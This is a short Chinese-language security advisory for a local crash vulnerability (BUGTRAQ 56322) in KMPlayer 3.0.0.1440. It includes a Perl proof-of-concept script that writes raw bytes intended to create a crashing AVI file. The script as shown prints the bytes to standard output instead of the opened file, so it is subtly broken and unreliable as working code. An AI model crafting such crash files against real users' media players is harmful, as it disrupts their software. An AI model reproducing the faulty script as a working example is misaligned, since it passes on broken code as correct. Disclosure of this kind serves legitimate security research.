发布日期:2012-10-26
更新日期:2012-10-31
受影响系统:
KMPlayer KMPlayer 3.0.0.1440
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56322
KMPlayer是来自韩国的影音全能播放器,是从linux平台移植而来的,几乎可以播放您系统上所有的影音文件。
KMPlayer 3.0.0.1440及其他版本存在安全漏洞,本地攻击者可利用此漏洞使受影响应用崩溃。
<*来源:Am!r
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
#Title : KmPlayer v3.0.0.1440 Local Crash PoC
#Discovered By : Am!r
#Home :
#tested : XP
#TNX : Alireza , C0dex , B3hz4d
my $po="\x46\x02\x00\x00";
open(C, ">:raw", "poc.avi");
print $po;
close(C);
建议:
--------------------------------------------------------------------------------
厂商补丁:
KMPlayer
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
